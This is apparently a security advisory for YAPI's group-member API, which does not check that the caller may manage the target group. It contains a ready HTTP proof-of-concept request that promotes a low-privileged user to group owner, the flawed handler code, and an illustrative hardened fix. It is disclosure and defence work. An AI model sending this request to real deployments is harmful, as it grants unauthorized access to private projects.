Description
When a developer creates a private project, its contents should be inaccessible to users who are not members. However, the group member API (`POST /api/group/add_member`) does not verify that the caller is entitled to manage the target group, so any authenticated low-privileged user can add themselves to an arbitrary group with the highest group role, `owner`, and thereby gain access to the private projects in that group.
Proof of Concept (PoC):
POST /api/group/add_member HTTP/1.1
Host: target
Content-Type: application/json
Cookie: _yapi_uid=<LOW_PRIV_UID>; _yapi_token=<LOW_PRIV_JWT>
{
    "id": <TARGET_GROUP_ID>,
    "member_uids": [<LOW_PRIV_UID>],
    "role": "owner"
}
Here `_yapi_uid` / `_yapi_token` are the session of the low-privileged account, `<LOW_PRIV_UID>` is that account's own user id, and `<TARGET_GROUP_ID>` is a group the account is not a member of. The request body is the only input; the caller's own group membership is never consulted.
Vulnerable Code
async addMember(ctx) {
    let params = ctx.params;
    let groupInst = yapi.getInst(groupModel);
    // The requested role is only whitelisted, never tied to what the caller is allowed to grant:
    // an unknown value falls back to 'dev', but 'owner' is accepted from anyone.
    params.role = ['owner', 'dev', 'guest'].find(v => v === params.role) || 'dev';
    let add_members = [];
    ...
    // userdata is the user being added (id comes from params.member_uids), with params.role attached.
    let userdata = await this.getUserdata(id, params.role);
    ...
    // The only gate: the user being added must not be a site admin. Nothing checks that the
    // caller (the uid behind the session cookie) is an owner of group params.id or a site admin.
    userdata.role !== 'admin' && add_members.push(userdata);
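The following is an added illustration and not YAPI's own code: a minimal in-memory model of the handler, first as the snippet above behaves (the only gate is on the target user's role), then with the missing caller check added. The data, the `ctx.uid` field standing in for the session uid, the helper names and the `405` "no permission" error code are all assumptions made for this example.

```javascript
// Added example, not part of the original advisory or of YAPI.
// Constructed sample data: group 10 is owned by uid 1; uid 42 is an
// ordinary user who is not a member of it; uid 99 is a site admin.
const users = new Map([
  [1,  { _id: 1,  username: 'owner',     role: 'member' }],
  [42, { _id: 42, username: 'lowpriv',   role: 'member' }],
  [99, { _id: 99, username: 'siteadmin', role: 'admin' }],
]);

// Fresh copy of the group table for each scenario, so runs do not interfere.
function freshGroups() {
  return new Map([
    [10, { _id: 10, group_name: 'private', members: [{ uid: 1, role: 'owner' }] }],
  ]);
}

// Mirrors the advisory's snippet: the role is whitelisted, the target user is
// looked up, and the only gate is "target user is not a site admin". Who is
// calling (ctx.uid) is never consulted.
function addMemberVulnerable(groups, ctx) {
  const params = ctx.params;
  params.role = ['owner', 'dev', 'guest'].find(v => v === params.role) || 'dev';
  const group = groups.get(params.id);
  if (!group) return { errcode: 400, errmsg: 'no such group' };
  const added = [];
  for (const uid of params.member_uids) {
    const u = users.get(uid);
    if (!u || group.members.some(m => m.uid === uid)) continue; // unknown or already a member
    if (u.role !== 'admin') {                                     // the only check performed
      group.members.push({ uid, role: params.role });
      added.push(uid);
    }
  }
  return { errcode: 0, add_members: added };
}

// Assumed fix: the caller, identified by the session uid (never by anything in
// the request body), must be a site admin or an existing owner of the group.
function callerMayManage(group, callerUid) {
  const caller = users.get(callerUid);
  if (caller && caller.role === 'admin') return true;
  return group.members.some(m => m.uid === callerUid && m.role === 'owner');
}

function addMemberHardened(groups, ctx) {
  const group = groups.get(ctx.params.id);
  if (!group) return { errcode: 400, errmsg: 'no such group' };
  if (!callerMayManage(group, ctx.uid)) return { errcode: 405, errmsg: 'no permission' };
  return addMemberVulnerable(groups, ctx); // same body logic once the caller is authorized
}

// The PoC request from the advisory, sent by the low-privileged user (uid 42)
// who asks to add themselves to group 10 as owner.
function pocRequest() {
  return { uid: 42, params: { id: 10, member_uids: [42], role: 'owner' } };
}

// Run the PoC against both handlers and report what happened to the group.
function demo() {
  const g1 = freshGroups();
  const vulnerable = addMemberVulnerable(g1, pocRequest());
  const g2 = freshGroups();
  const hardened = addMemberHardened(g2, pocRequest());
  return {
    vulnerable,
    hardened,
    selfPromoted: g1.get(10).members.some(m => m.uid === 42 && m.role === 'owner'),
    stillExcluded: !g2.get(10).members.some(m => m.uid === 42),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Note that the hardened variant still lets a legitimate owner add members, and that an attacker-controlled `member_uids` or `role` value never reaches the membership table unless the caller already holds the right to grant it.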
Reproduction Steps
First, log in as the low-privileged account and confirm that it has no access to the target private project.

Then send the PoC request above to add that account to the project's group with the role `owner`.

Finally, refresh the page: the project is now fully accessible and can be operated on as an owner.
